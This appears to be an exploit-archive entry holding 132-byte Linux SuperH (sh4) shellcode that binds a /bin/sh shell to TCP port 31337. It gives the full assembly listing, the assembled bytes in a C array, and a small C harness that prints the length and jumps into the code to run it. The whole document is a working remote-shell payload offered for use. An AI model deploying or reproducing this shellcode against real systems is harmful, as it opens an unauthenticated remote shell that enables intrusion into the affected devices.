Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)

/*
 * Bind /bin/sh on port 31337
 * SH4 - 132bytes
main:
    mov     #102,r3
    mov     #2,r4
    mov     #1,r5
    xor     r6,r6
    mov.l   r6,@-r15
    mov.l   r5,@-r15
    mov.l   r4,@-r15
    mov     #1,r4
    mov     r15,r5
    trapa   #19
    mov     r0,r4
    mov     r0,r8
    xor     r2,r2
    mov.l   r2,@-r15
    mov     #105,r2
    mov.b   r2,@-r15
    mov     #122,r2
    mov.b   r2,@-r15
    xor     r2,r2
    mov.b   r2,@-r15
    mov     #2,r2
    mov.b   r2,@-r15
    mov     r15,r5
    mov     #16,r6
    mov.l   r6,@-r15
    mov.l   r5,@-r15
    mov.l   r4,@-r15
    mov     #2,r4
    mov     r15,r5
    trapa   #19
    mov     r8,r4
    xor     r5,r5
    xor     r6,r6
    mov.l   r6,@-r15
    mov.l   r5,@-r15
    mov.l   r4,@-r15
    mov     #4,r4
    mov     r15,r5
    trapa   #19
    mov     r8,r4
    xor     r5,r5
    xor     r6,r6
    mov.l   r6,@-r15
    mov.l   r5,@-r15
    mov.l   r4,@-r15
    mov     #5,r4
    mov     r15,r5
    trapa   #19
    mov     r0,r9
    mov     #3,r10
dup:
    add     #-1,r10
    mov     #63,r3
    mov     r9,r4
    mov     r10,r5
    trapa   #19
    cmp/pl  r10
    bt      dup
    mov     #11,r3
    mova    @(8,pc),r0
    mov     r0,r4
    xor     r5,r5
    trapa   #19
    .string "///bin/sh"
 */
#include <stdio.h>
#include <string.h>
 
char code[] = "\x66\xe3\x02\xe4\x01\xe5\x6a\x26\x66\x2f\x56\x2f\x46\x2f\x01\xe4\xf3\x65\x13\xc3\x03\x64\x03\x68\x2a\x22\x26\x2f\x69\xe2\x24\x2f\x7a\xe2\x24\x2f\x2a\x22\x24\x2f\x02\xe2\x24\x2f\xf3\x65\x10\xe6\x66\x2f\x56\x2f\x46\x2f\x02\xe4\xf3\x65\x13\xc3\x83\x64\x5a\x25\x6a\x26\x66\x2f\x56\x2f\x46\x2f\x04\xe4\xf3\x65\x13\xc3\x83\x64\x5a\x25\x6a\x26\x66\x2f\x56\x2f\x46\x2f\x05\xe4\xf3\x65\x13\xc3\x03\x69\x03\xea\xff\x7a\x3f\xe3\x93\x64\xa3\x65\x13\xc3\x15\x4a\xf8\x89\x0b\xe3\x01\xc7\x03\x64\x5a\x25\x13\xc3\x2f\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x00";
 
int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}